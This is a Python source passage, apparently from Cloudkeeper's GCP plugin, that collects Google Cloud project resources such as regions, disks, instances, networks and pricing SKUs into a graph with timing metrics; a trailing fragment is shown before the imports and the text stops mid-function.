resource_family=r.get("category", {}).get("resourceFamily"), resource_group=r.get("category", {}).get("resourceGroup"), usage_type=r.get("category", {}).get("usageType"), pricing_info=r.get("pricingInfo"), service_provider_name=r.get("serviceProviderName"), geo_taxonomy_type=r.get("geoTaxonomy", {}).get("type"), geo_taxonomy_regions=r.get("geoTaxonomy", {}).get("regions"), link=( f"https://{service.client}.googleapis.com/" f"{service.api_version}/{r.get("name")}" ), _account=service.account(graph), _region=service.region(graph), _zone=service.zone(graph), ) graph.add_resource(service, sku) self.collect_something( resource_class=GCPService, paginate_method_name="list", paginate_items_name="services", attr_map={ "id": "serviceId", "name": "displayName", }, post_process=post_process, ) @metrics_collect_instance_templates.time() def collect_instance_templates(self): self.collect_something( resource_class=GCPInstanceTemplate, search_map={ "__machine_type": ["link", "machineType"], }, predecessors=["__machine_type"], )
import cklib.logging import socket from pprint import pformat from retrying import retry from typing import Callable, List, Dict, Type, Union from cklib.baseresources import BaseResource from cklib.graph import Graph from cklib.args import ArgumentParser from cklib.utils import except_log_and_pass from prometheus_client import Summary from .resources import ( GCPProject, GCPQuota, GCPRegion, GCPZone, GCPDiskType, GCPDisk, GCPInstance, GCPMachineType, GCPNetwork, GCPSubnetwork, GCPTargetVPNGateway, GCPVPNGateway, GCPVPNTunnel, GCPRouter, GCPRoute, GCPSecurityPolicy, GCPSnapshot, GCPSSLCertificate, GCPNetworkEndpointGroup, GCPGlobalNetworkEndpointGroup, GCPInstanceGroup, GCPInstanceGroupManager, GCPAutoscaler, GCPHealthCheck, GCPHTTPHealthCheck, GCPHTTPSHealthCheck, GCPUrlMap, GCPTargetPool, GCPTargetHttpProxy, GCPTargetHttpsProxy, GCPTargetSslProxy, GCPTargetTcpProxy, GCPTargetGrpcProxy, GCPTargetInstance, GCPBackendService, GCPForwardingRule, GCPGlobalForwardingRule, GCPBucket, GCPDatabase, GCPService, GCPServiceSKU, GCPInstanceTemplate, ) from .utils import ( Credentials, gcp_client, gcp_resource, paginate, iso2datetime, get_result_data, common_resource_kwargs, retry_on_error, ) log = cklib.logging.getLogger("cloudkeeper." + __name__) metrics_collect_regions = Summary( "cloudkeeper_plugin_gcp_collect_regions_seconds", "Time it took the collect_regions() method", ) metrics_collect_zones = Summary( "cloudkeeper_plugin_gcp_collect_zones_seconds", "Time it took the collect_zones() method", ) metrics_collect_disks = Summary( "cloudkeeper_plugin_gcp_collect_disks_seconds", "Time it took the collect_disks() method", ) metrics_collect_instances = Summary( "cloudkeeper_plugin_gcp_collect_instances_seconds", "Time it took the collect_instances() method", ) metrics_collect_disk_types = Summary( "cloudkeeper_plugin_gcp_collect_disk_types_seconds", "Time it took the collect_disk_types() method", ) metrics_collect_networks = Summary( "cloudkeeper_plugin_gcp_collect_networks_seconds", "Time it took the collect_networks() method", ) metrics_collect_subnetworks = Summary( "cloudkeeper_plugin_gcp_collect_subnetworks_seconds", "Time it took the collect_subnetworks() method", ) metrics_collect_vpn_tunnels = Summary( "cloudkeeper_plugin_gcp_collect_vpn_tunnels_seconds", "Time it took the collect_vpn_tunnels() method", ) metrics_collect_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_vpn_gateways_seconds", "Time it took the collect_vpn_gateways() method", ) metrics_collect_target_vpn_gateways = Summary( "cloudkeeper_plugin_gcp_collect_target_vpn_gateways_seconds", "Time it took the collect_target_vpn_gateways() method", ) metrics_collect_routers = Summary( "cloudkeeper_plugin_gcp_collect_routers_seconds", "Time it took the collect_routers() method", ) metrics_collect_routes = Summary( "cloudkeeper_plugin_gcp_collect_routes_seconds", "Time it took the collect_routes() method", ) metrics_collect_security_policies = Summary( "cloudkeeper_plugin_gcp_collect_security_policies_seconds", "Time it took the collect_security_policies() method", ) metrics_collect_snapshots = Summary( "cloudkeeper_plugin_gcp_collect_snapshots_seconds", "Time it took the collect_snapshots() method", ) metrics_collect_ssl_certificates = Summary( "cloudkeeper_plugin_gcp_collect_ssl_certificates_seconds", "Time it took the collect_ssl_certificates() method", ) metrics_collect_machine_types = Summary( "cloudkeeper_plugin_gcp_collect_machine_types_seconds", "Time it took the collect_machine_types() method", ) metrics_collect_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_network_endpoint_groups_seconds", "Time it took the collect_network_endpoint_groups() method", ) metrics_collect_global_network_endpoint_groups = Summary( "cloudkeeper_plugin_gcp_collect_global_network_endpoint_groups_seconds", "Time it took the collect_global_network_endpoint_groups() method", ) metrics_collect_instance_groups = Summary( "cloudkeeper_plugin_gcp_collect_instance_groups_seconds", "Time it took the collect_instance_groups() method", ) metrics_collect_instance_group_managers = Summary( "cloudkeeper_plugin_gcp_collect_instance_group_managers_seconds", "Time it took the collect_instance_group_managers() method", ) metrics_collect_autoscalers = Summary( "cloudkeeper_plugin_gcp_collect_autoscalers_seconds", "Time it took the collect_autoscalers() method", ) metrics_collect_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_health_checks_seconds", "Time it took the collect_health_checks() method", ) metrics_collect_http_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_http_health_checks_seconds", "Time it took the collect_http_health_checks() method", ) metrics_collect_https_health_checks = Summary( "cloudkeeper_plugin_gcp_collect_https_health_checks_seconds", "Time it took the collect_https_health_checks() method", ) metrics_collect_url_maps = Summary( "cloudkeeper_plugin_gcp_collect_url_maps_seconds", "Time it took the collect_url_maps() method", ) metrics_collect_target_pools = Summary( "cloudkeeper_plugin_gcp_collect_target_pools_seconds", "Time it took the collect_target_pools() method", ) metrics_collect_target_instances = Summary( "cloudkeeper_plugin_gcp_collect_target_instances_seconds", "Time it took the collect_target_instances() method", ) metrics_collect_target_http_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_http_proxies_seconds", "Time it took the collect_target_http_proxies() method", ) metrics_collect_target_https_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_https_proxies_seconds", "Time it took the collect_target_https_proxies() method", ) metrics_collect_target_ssl_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_ssl_proxies_seconds", "Time it took the collect_target_ssl_proxies() method", ) metrics_collect_target_tcp_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_tcp_proxies_seconds", "Time it took the collect_target_tcp_proxies() method", ) metrics_collect_target_grpc_proxies = Summary( "cloudkeeper_plugin_gcp_collect_target_grpc_proxies_seconds", "Time it took the collect_target_grpc_proxies() method", ) metrics_collect_backend_services = Summary( "cloudkeeper_plugin_gcp_collect_backend_services_seconds", "Time it took the collect_backend_services() method", ) metrics_collect_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_forwarding_rules_seconds", "Time it took the collect_forwarding_rules() method", ) metrics_collect_global_forwarding_rules = Summary( "cloudkeeper_plugin_gcp_collect_global_forwarding_rules_seconds", "Time it took the collect_global_forwarding_rules() method", ) metrics_collect_buckets = Summary( "cloudkeeper_plugin_gcp_collect_buckets_seconds", "Time it took the collect_buckets() method", ) metrics_collect_databases = Summary( "cloudkeeper_plugin_gcp_collect_databases_seconds", "Time it took the collect_databases() method", ) metrics_collect_services = Summary( "cloudkeeper_plugin_gcp_collect_services_seconds", "Time it took the collect_services() method", ) metrics_collect_instance_templates = Summary( "cloudkeeper_plugin_gcp_collect_instance_templates_seconds", "Time it took the collect_instance_templates() method", ) class GCPProjectCollector: """Collects a single GCP project. Responsible for collecting all the resources of an individual project. Builds up its own local graph which is then taken by collect_project() and merged with the plugin graph. This way we can have many instances of GCPProjectCollector running in parallel. All building up individual graphs which in the end are merged to a final graph containing all GCP resources. """ def __init__(self, project: GCPProject) -> None: """ Args: project: The GCP project resource object this project collector is going to collect. """ self.project = project self.credentials = Credentials.get(self.project.id) self.graph = Graph(root=self.project) # Mandatory collectors are always collected regardless of whether # they were included by --gcp-collect or excluded by --gcp-no-collect self.mandatory_collectors = { "regions": self.collect_regions, "zones": self.collect_zones, } # Global collectors are resources that are either specified on a global level # as opposed to a per zone or per region level or they are zone/region # resources that provide a aggregatedList() function returning all resources # for all zones/regions. self.global_collectors = { "services": self.collect_services, "networks": self.collect_networks, "subnetworks": self.collect_subnetworks, "routers": self.collect_routers, "routes": self.collect_routes, "health_checks": self.collect_health_checks, "http_health_checks": self.collect_http_health_checks, "https_health_checks": self.collect_https_health_checks, "machine_types": self.collect_machine_types, "instances": self.collect_instances, "disk_types": self.collect_disk_types, "disks": self.collect_disks, "target_vpn_gateways": self.collect_target_vpn_gateways, "vpn_gateways": self.collect_vpn_gateways, "vpn_tunnels": self.collect_vpn_tunnels, "security_policies": self.collect_security_policies, "snapshots": self.collect_snapshots, "ssl_certificates": self.collect_ssl_certificates, "network_endpoint_groups": self.collect_network_endpoint_groups, "instance_groups": self.collect_instance_groups, "instance_group_managers": self.collect_instance_group_managers, "autoscalers": self.collect_autoscalers, "backend_services": self.collect_backend_services, "url_maps": self.collect_url_maps, "target_pools": self.collect_target_pools, "target_instances": self.collect_target_instances, "target_http_proxies": self.collect_target_http_proxies, "target_https_proxies": self.collect_target_https_proxies, "target_ssl_proxies": self.collect_target_ssl_proxies, "target_tcp_proxies": self.collect_target_tcp_proxies, "target_grpc_proxies": self.collect_target_grpc_proxies, "forwarding_rules": self.collect_forwarding_rules, "buckets": self.collect_buckets, "databases": self.collect_databases, "instance_templates": self.collect_instance_templates, } # Region collectors collect resources in a single region. # They are being passed the GCPRegion resource object as `region` arg. self.region_collectors = {} # Zone collectors are being called for each zone. # They are being passed the GCPZone resource object as `zone` arg. self.zone_collectors = {} self.all_collectors = dict(self.mandatory_collectors) self.all_collectors.update(self.global_collectors) self.all_collectors.update(self.region_collectors) self.all_collectors.update(self.zone_collectors) self.collector_set = set(self.all_collectors.keys()) @retry( stop_max_attempt_number=10, wait_exponential_multiplier=3000, wait_exponential_max=300000, retry_on_exception=retry_on_error, ) def collect(self) -> None: """Runs the actual resource collection across all resource collectors. Resource collectors add their resources to the local `self.graph` graph. """ self.graph = Graph(root=self.project) collectors = set(self.collector_set) if len(ArgumentParser.args.gcp_collect) > 0: collectors = set(ArgumentParser.args.gcp_collect).intersection(collectors) if len(ArgumentParser.args.gcp_no_collect) > 0: collectors = collectors - set(ArgumentParser.args.gcp_no_collect) collectors = collectors.union(set(self.mandatory_collectors.keys())) log.debug( ( f"Running the following collectors in {self.project.rtdname}:" f" {', '.join(collectors)}" ) ) for collector_name, collector in self.mandatory_collectors.items(): if collector_name in collectors: log.info(f"Collecting {collector_name} in {self.project.rtdname}") collector() regions = [r for r in self.graph.nodes if isinstance(r, GCPRegion)] zones = [z for z in self.graph.nodes if isinstance(z, GCPZone)] log.debug(f"Found {len(zones)} zones in {len(regions)} regions") for collector_name, collector in self.global_collectors.items(): if collector_name in collectors: log.info(f"Collecting {collector_name} in {self.project.rtdname}") collector() # Todo: parallelize region and zone collection for region in regions: for collector_name, collector in self.region_collectors.items(): if collector_name in collectors: log.info( ( f"Collecting {collector_name} in {region.rtdname}" f" {self.project.rtdname}" ) ) collector(region=region) for zone in zones: for collector_name, collector in self.zone_collectors.items(): if collector_name in collectors: log.info( ( f"Collecting {collector_name} in {zone.rtdname}" f" {self.project.rtdname}" ) ) collector(zone=zone) def default_attributes( self, result: Dict, attr_map: Dict = None, search_map: Dict = None ) -> Dict: """Finds resource attributes in the GCP API result data and returns them together with any graph search results. Args: result: Dict containing the result or a GCP API execute() call. attr_map: Dict of map_to: map_from pairs where map_to is the name of the arg that a Cloudkeeper resource expects and map_from is the name of the key in the result dictionary. search_map: Dict of map_to: [search_attr, search_value_name]. Where map_to is the arg that a Cloudkeeper resource expects. search_attr is the attribute name to search for in the graph and search_value_name is the name of the key in the result dictionary that is passed into the graph search as attribute value. Example: result: ``` { 'creationTimestamp': '2020-10-08T05:45:43.294-07:00', 'id': '7684174949783877401', 'kind': 'compute#disk', 'labelFingerprint': '42WmSpB8rSM=', 'lastAttachTimestamp': '2020-10-08T05:45:43.294-07:00', 'name': 'instance-group-1-lnmq', 'physicalBlockSizeBytes': '4096', 'sizeGb': '10', 'status': 'READY', 'selfLink': 'https://www.googleapis.com/.../disks/instance-1-lnmq', 'type': 'https://www.googleapis.com/.../diskTypes/pd-standard', 'users': ['https://www.googleapis.com/.../instances/instance-1-lnmq'], 'zone': 'https://www.googleapis.com/.../zones/europe-west1-d' } attr_map: { "volume_size": "sizeGb", "volume_status": "status", } search_map: { "volume_type": ["link", "type"], "__users": ["link", "users"], } ``` This would create GCPDisk( identifier="7684174949783877401", name="instance-group-1-lnmq", ctime=iso2datetime("2020-10-08T05:45:43.294-07:00"), volume_size="10", volume_status="READY", volume_type=GCPDiskType() link="https://www.googleapis.com/.../disks/instance-1-lnmq" ) Where the GCPDiskType() object would be one that was found in the graph with attribute "link": https://www.googleapis.com/.../diskTypes/pd-standard The map_from and search_value_name in attr_map and search_map respectively can also be a callable which is passed the entire result dict and then responsible for finding and returning the relevant data. E.g. the entry from above: "volume_size": "sizeGb", could also be written as: "volume_size": (lambda r: r.get("sizeGb")), This is mainly useful for searching deeply nested data. Any key in the search_map that starts with an underscore like _users in the example above will only be looked up and if found added to the search_results return value but not be added to kwargs. This returned search data can then be used to draw predecessor and successor edges in the graph. """ # The following are default attributes that are passed to every # BaseResource() if found in `result` kwargs = { "id": result.get("id", result.get("name", result.get("selfLink"))), "tags": result.get("labels", {}), "name": result.get("name"), "ctime": iso2datetime(result.get("creationTimestamp")), "link": result.get("selfLink"), "label_fingerprint": result.get("labelFingerprint"), "_account": self.project, } if attr_map is not None: for map_to, map_from in attr_map.items(): data = get_result_data(result, map_from) if data is None: log.debug(f"Attribute {map_from} not in result") continue log.debug(f"Found attribute {map_to}: {pformat(data)}") kwargs[map_to] = data # By default we search for a resources region and/or zone default_search_map = {"_region": ["link", "region"], "_zone": ["link", "zone"]} search_results = {} if search_map is None: search_map = dict(default_search_map) else: updated_search_map = dict(default_search_map) updated_search_map.update(search_map) search_map = updated_search_map for map_to, search_data in search_map.items(): search_attr = search_data[0] search_value_name = search_data[1] search_value = get_result_data(result, search_value_name) if search_value is None: continue if isinstance(search_value, List): search_values = search_value else: search_values = [search_value] for search_value in search_values: search_result = self.graph.search_first(search_attr, search_value) if search_result: if map_to not in search_results: search_results[map_to] = [] search_results[map_to].append(search_result) if ( map_to not in kwargs and map_to in search_results and not str(map_to).startswith("__") ): search_result = search_results[map_to] if len(search_result) == 1: kwargs[map_to] = search_result[0] else: kwargs[map_to] = list(search_result) # If the resource was referencing a zone but not a region we look up its # region based on the zone information we found. # E.g. if we know a disk is in zone us-central1-a then we can find # the region us-central1 from that. if ( "_zone" in kwargs and "_region" not in kwargs and isinstance(kwargs["_zone"], BaseResource) ): region = kwargs["_zone"].region(self.graph) if region: kwargs["_region"] = region if "_region" in search_map.keys() and "_region" not in search_results: search_results["_region"] = region return kwargs, search_results @except_log_and_pass(do_raise=socket.timeout) def collect_something( self, resource_class: Type[BaseResource], paginate_method_name: str = "list", paginate_items_name: str = "items", parent_resource: Union[BaseResource, str] = None, attr_map: Dict = None, search_map: Dict = None, successors: List = None, predecessors: List = None, client_kwargs: Dict = None, resource_kwargs: Dict = None, paginate_subitems_name: str = None, post_process: Callable = None, dump_resource: bool = False, ) -> List: """Collects some resource and adds it to the graph. Args: resource_class: A GCP resource class name that inherits Cloudkeeper's BaseResource paginate_method_name: usually "list" or "aggregatedList" paginate_items_name: key name that contains all the items of our list/aggregatedList request parent_resource: The resources parent resource in the graph. This defaults to the zone or region for local or the project for global resources. attr_map: Dict containing a mapping of GCP API result dict keys to resource_class attributes. See default_attributes() for a detailed description. search_map: Dict containing a mapping similar to attr_map except that any results get looked up in `self.graph` instead of just passing the result data as an attribute. successors: List of resource successors (child nodes) predecessors: List of resource predecessors (parent nodes) client_kwargs: **kwargs that get passed to the GCP client resource_kwargs: **kwargs that get passed to the GCP resource paginate_subitems_name: Name of a resource in a aggregatedList result set Defaults to be the name as the client method name. E.g. if we request all disks it'll be {"items": {'zones/...': {'disks': []}} post_process: Callable that is called after a resource has been added to the graph. The resource object and the graph are given as args. dump_resource: If True will log.debug() a dump of the API result. """ client_method_name = resource_class("", {})._client_method default_resource_args = resource_class("", {}).resource_args log.debug(f"Collecting {client_method_name}") if paginate_subitems_name is None: paginate_subitems_name = client_method_name if client_kwargs is None: client_kwargs = {} if resource_kwargs is None: resource_kwargs = {} if successors is None: successors = [] if predecessors is None: predecessors = [] parent_map = {True: predecessors, False: successors} if "project" in default_resource_args: resource_kwargs["project"] = self.project.id client = gcp_client( resource_class.client, resource_class.api_version, credentials=self.credentials, **client_kwargs, ) gcp_resource = getattr(client, client_method_name) if not callable(gcp_resource): raise RuntimeError(f"No method {client_method_name} on client {client}") for resource in paginate( gcp_resource=gcp_resource(), method_name=paginate_method_name, items_name=paginate_items_name, subitems_name=paginate_subitems_name, **resource_kwargs, ): kwargs, search_results = self.default_attributes( resource, attr_map=attr_map, search_map=search_map ) r = resource_class(**kwargs) pr = parent_resource log.debug(f"Adding {r.rtdname} to the graph") if dump_resource: log.debug(f"Resource Dump: {pformat(resource)}") if isinstance(pr, str) and pr in search_results: pr = search_results[parent_resource][0] log.debug(f"Parent resource for {r.rtdname} set to {pr.rtdname}") if not isinstance(pr, BaseResource): pr = kwargs.get("_zone", kwargs.get("_region", self.graph.root)) log.debug( f"Parent resource for {r.rtdname} automatically set to {pr.rtdname}" ) self.graph.add_resource(pr, r) for is_parent, sr_names in parent_map.items(): for sr_name in sr_names: if sr_name in search_results: srs = search_results[sr_name] for sr in srs: if is_parent: src = sr dst = r else: src = r dst = sr self.graph.add_edge(src, dst) else: if sr_name in search_map: graph_search = search_map[sr_name] attr = graph_search[0] value_name = graph_search[1] if value_name in resource: value = resource[value_name] if isinstance(value, List): values = value for value in values: r.add_deferred_connection( attr, value, is_parent ) elif isinstance(value, str): r.add_deferred_connection(attr, value, is_parent) else: log.error( ( "Unable to add deferred connection for" f" value {value} of type {type(value)}" ) ) else: log.error(f"Key {sr_name} is missing in search_map") if callable(post_process): post_process(r, self.graph) # All of the following methods just call collect_something() with some resource # specific options. @metrics_collect_regions.time() def collect_regions(self) -> List: def post_process(resource: GCPRegion, graph: Graph): for quota in resource._quotas: if set(["metric", "limit", "usage"]) == set(quota.keys()): q = GCPQuota( quota["metric"], {}, quota=quota["limit"], usage=quota["usage"], _region=resource.region(), _account=resource.account(), _zone=resource.zone(), ctime=resource.ctime, ) graph.add_resource(resource, q) resource._quotas = None self.collect_something( resource_class=GCPRegion, attr_map={"region_status": "status", "quotas": "quotas"}, post_process=post_process, ) @metrics_collect_zones.time() def collect_zones(self) -> List: self.collect_something( resource_class=GCPZone, ) @metrics_collect_disks.time() def collect_disks(self): def volume_status(result): status = result.get("status") num_users = len(result.get("users", [])) if num_users == 0 and status == "READY": status = "AVAILABLE" return status self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDisk, search_map={ "volume_type": ["link", "type"], "__users": ["link", "users"], }, attr_map={ "volume_size": (lambda r: int(r.get("sizeGb"))), "volume_status": volume_status, "last_attach_timestamp": ( lambda r: iso2datetime( r.get("lastAttachTimestamp", r["creationTimestamp"]) ) ), "last_detach_timestamp": ( lambda r: iso2datetime( r.get("lastDetachTimestamp", r["creationTimestamp"]) ) ), }, predecessors=["volume_type"], successors=["__users"], ) @metrics_collect_instances.time() def collect_instances(self): def post_process(resource: GCPInstance, graph: Graph): """Post process instance resources The first time we encounter a custom machine type we will fetch its details. This is because the machineTypes API's list/aggregatedList functions only return predefined machine types. Custom ones have to be fetched individually when we encounter them on a instance. Once added to the graph Cloudkeeper will find it for successive instances of the same machine type. """ if resource.instance_type == "" and "custom" in resource._machine_type_link: log.debug(f"Fetching custom instance type for {resource.rtdname}") machine_type = GCPMachineType( resource._machine_type_link.split("/")[-1], {}, _zone=resource.zone(graph), _account=resource.account(graph), link=resource._machine_type_link, ) resource._machine_type_link = None kwargs = {str(machine_type._get_identifier): machine_type.name} common_kwargs = common_resource_kwargs(machine_type) kwargs.update(common_kwargs) gr = gcp_resource(machine_type) request = gr.get(**kwargs) result = request.execute() machine_type.id = result.get("id") machine_type.instance_cores = float(result.get("guestCpus")) machine_type.instance_memory = float(result.get("memoryMb", 0) / 1024) graph.add_resource(machine_type.zone(graph), machine_type) graph.add_edge(machine_type, resource) self.post_process_machine_type(machine_type, graph) resource._machine_type = machine_type self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPInstance, post_process=post_process, search_map={ "__network": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "network" ) ), ], "__subnetwork": [ "link", ( lambda r: next(iter(r.get("networkInterfaces", [])), {}).get( "subnetwork" ) ), ], "machine_type": ["link", "machineType"], }, attr_map={ "instance_status": "status", "machine_type_link": "machineType", }, predecessors=["__network", "__subnetwork", "machine_type"], ) @metrics_collect_disk_types.time() def collect_disk_types(self): def post_process(resource: GCPDiskType, graph: Graph): if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) resource_group_map = { "local-ssd": "LocalSSD", "pd-balanced": "SSD", "pd-ssd": "SSD", "pd-standard": "PDStandard", } resource_group = resource_group_map.get(resource.name) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Storage", "usage_type": "OnDemand", "resource_group": resource_group, } ): try: if resource.region(graph).name not in sku.geo_taxonomy_regions: continue except TypeError: log.exception( f"Problem accessing geo_taxonomy_regions in {sku.rtdname}:" f" {type(sku.geo_taxonomy_regions)}" ) if resource.name == "pd-balanced" and not sku.name.startswith( "Balanced" ): continue if resource.name != "pd-balanced" and sku.name.startswith("Balanced"): continue if resource.zone(graph).name != "undefined" and sku.name.startswith( "Regional" ): continue if ( resource.zone(graph).name == "undefined" and not sku.name.startswith("Regional") and resource.name != "pd-balanced" ): continue skus.append(sku) if len(skus) == 1: graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 else: log.debug(f"Unable to determine SKU for {resource}") self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPDiskType, post_process=post_process, ) @metrics_collect_networks.time() def collect_networks(self): self.collect_something( resource_class=GCPNetwork, ) @metrics_collect_subnetworks.time() def collect_subnetworks(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSubnetwork, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_vpn_tunnels.time() def collect_vpn_tunnels(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNTunnel, search_map={ "__vpn_gateway": ["link", "vpnGateway"], "__target_vpn_gateway": ["link", "targetVpnGateway"], }, successors=["__target_vpn_gateway", "__vpn_gateway"], ) @metrics_collect_vpn_gateways.time() def collect_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_target_vpn_gateways.time() def collect_target_vpn_gateways(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPTargetVPNGateway, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routers.time() def collect_routers(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPRouter, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_routes.time() def collect_routes(self): self.collect_something( resource_class=GCPRoute, search_map={ "__network": ["link", "network"], }, predecessors=["__network"], ) @metrics_collect_security_policies.time() def collect_security_policies(self): self.collect_something(resource_class=GCPSecurityPolicy) @metrics_collect_snapshots.time() def collect_snapshots(self): self.collect_something( resource_class=GCPSnapshot, search_map={ "volume_id": ["link", "sourceDisk"], }, attr_map={ "volume_size": lambda r: int(r.get("diskSizeGb", -1)), "storage_bytes": lambda r: int(r.get("storageBytes", -1)), }, ) @metrics_collect_ssl_certificates.time() def collect_ssl_certificates(self): self.collect_something( paginate_method_name="aggregatedList", resource_class=GCPSSLCertificate, attr_map={ "ctime": lambda r: iso2datetime(r.get("creationTimestamp")), "expires": lambda r: iso2datetime(r.get("expireTime")), "description": "description", "certificate": "certificate", "certificate_type": "type", "certificate_managed": "managed", "subject_alternative_names": "subjectAlternativeNames", }, search_map={ "__user": ["link", "user"], }, successors=["__user"], ) @staticmethod def post_process_machine_type(resource: GCPMachineType, graph: Graph): """Adds edges from machine type to SKUs and determines ondemand pricing TODO: Implement GPU types """ if ( resource.region(graph).name == "undefined" and resource.zone(graph).name == "undefined" ): log.error( f"Resource {resource.rtdname} has no region or zone" " - removing from graph" ) graph.remove_node(resource) return log.debug( ( f"Looking up pricing for {resource.rtdname}" f" in {resource.location(graph).rtdname}" ) ) skus = [] for sku in graph.searchall( { "kind": "gcp_service_sku", "resource_family": "Compute", "usage_type": "OnDemand", } ): if sku.resource_group not in ( "G1Small", "F1Micro", "N1Standard", "CPU", "RAM", ): continue if ("custom" not in resource.name and "Custom" in sku.name) or ( "custom" in resource.name and "Custom" not in sku.name ): continue if resource.region(graph).name not in sku.geo_taxonomy_regions: continue if resource.name == "g1-small" and sku.resource_group != "G1Small": continue if resource.name == "f1-micro" and sku.resource_group != "F1Micro": continue if ( resource.name.startswith("n2d-") and not sku.name.startswith("N2D AMD ") ) or ( not resource.name.startswith("n2d-") and sku.name.startswith("N2D AMD ") ): continue if (resource.name.startswith("n2-") and not sku.name.startswith("N2 ")) or ( not resource.name.startswith("n2-") and sku.name.startswith("N2 ") ): continue if ( resource.name.startswith("m1-") and not sku.name.startswith("Memory-optimized ") ) or ( not resource.name.startswith("m1-") and sku.name.startswith("Memory-optimized ") ): continue if ( resource.name.startswith("c2-") and not sku.name.startswith("Compute optimized ") ) or ( not resource.name.startswith("c2-") and sku.name.startswith("Compute optimized ") ): continue if resource.name.startswith("n1-") and sku.resource_group != "N1Standard": continue if "custom" not in resource.name: if ( resource.name.startswith("e2-") and not sku.name.startswith("E2 ") ) or ( not resource.name.startswith("e2-") and sku.name.startswith("E2 ") ): continue skus.append(sku) if len(skus) == 1 and resource.name in ("g1-small", "f1-micro"): graph.add_edge(skus[0], resource) resource.ondemand_cost = skus[0].usage_unit_nanos / 1000000000 elif len(skus) == 2 or (len(skus) == 3 and "custom" in resource.name): ondemand_cost = 0 cores = resource.instance_cores ram = resource.instance_memory extended_memory_pricing = False if "custom" in resource.name: extended_memory_pricing = ram / cores > 8 for sku in skus: if "Core" in sku.name: ondemand_cost += sku.usage_unit_nanos * cores elif "Ram" in sku.name: if (extended_memory_pricing and "Extended" not in sku.name) or ( not extended_memory_pricing and "Extended" in sku.name ): continue ondemand_cost += sku.usage_unit_nanos * ram graph.add_edge(sku, resource) if ondemand_cost > 0: resource.ondemand_cost = ondemand_cost / 1000000000 else: log.debug( ( f"Unable to determine SKU(s) for {resource}:" f" {[sku.dname for sku in skus]}" ) ) @metrics_collect_machine_types.time() def collect_machine_types(self): self.collect_something( resource_class=GCPMachineType, paginate_method_name="aggregatedList", search_map={ "_zone": ["name", "zone"], }, attr_map={ "instance_cores": lambda r: float(r.get("guestCpus", 0)), "instance_memory": lambda r: float(r.get("memoryMb", 0) / 1024), }, post_process=self.post_process_machine_type, ) @metrics_collect_network_endpoint_groups.time() def collect_network_endpoint_groups(self): self.collect_something( resource_class=GCPNetworkEndpointGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_global_network_endpoint_groups.time() def collect_global_network_endpoint_groups(self): self.collect_something( resource_class=GCPGlobalNetworkEndpointGroup, search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, attr_map={ "default_port": "defaultPort", "neg_type": "networkEndpointType", }, predecessors=["__network", "__subnetwork"], ) @metrics_collect_instance_groups.time() def collect_instance_groups(self): def post_process(resource: GCPInstanceGroup, graph: Graph): kwargs = {"instanceGroup": resource.name} kwargs.update(common_resource_kwargs(resource)) log.debug(f"Getting instances for {resource}") for r in paginate( gcp_resource=gcp_resource(resource, graph), method_name="listInstances", items_name="items", **kwargs, ): i = graph.search_first("link", r.get("instance")) if i: graph.add_edge(i, resource) self.collect_something( resource_class=GCPInstanceGroup, paginate_method_name="aggregatedList", search_map={ "__subnetwork": ["link", "subnetwork"], "__network": ["link", "network"], }, predecessors=["__network", "__subnetwork"], post_process=post_process, ) @metrics_collect_instance_group_managers.time() def collect_instance_group_managers(self): self.collect_something( resource_class=GCPInstanceGroupManager, paginate_method_name="aggregatedList", search_map={ "__instance_group": ["link", "instanceGroup"], "__health_checks": [ "link", ( lambda r: [ hc.get("healthCheck", "") for hc in r.get("autoHealingPolicies", []) ] ), ], }, predecessors=["__instance_group", "__health_checks"], ) @metrics_collect_autoscalers.time() def collect_autoscalers(self): self.collect_something( resource_class=GCPAutoscaler, paginate_method_name="aggregatedList", search_map={ "__instance_group_manager": ["link", "target"], }, attr_map={ "min_size": ( lambda r: r.get("autoscalingPolicy", {}).get("minNumReplicas", -1) ), "max_size": ( lambda r: r.get("autoscalingPolicy", {}).get("maxNumReplicas", -1) ), }, successors=["__instance_group_manager"], ) @metrics_collect_health_checks.time() def collect_health_checks(self): self.collect_something( resource_class=GCPHealthCheck, paginate_method_name="aggregatedList", attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", }, ) @metrics_collect_http_health_checks.time() def collect_http_health_checks(self): self.collect_something( resource_class=GCPHTTPHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", 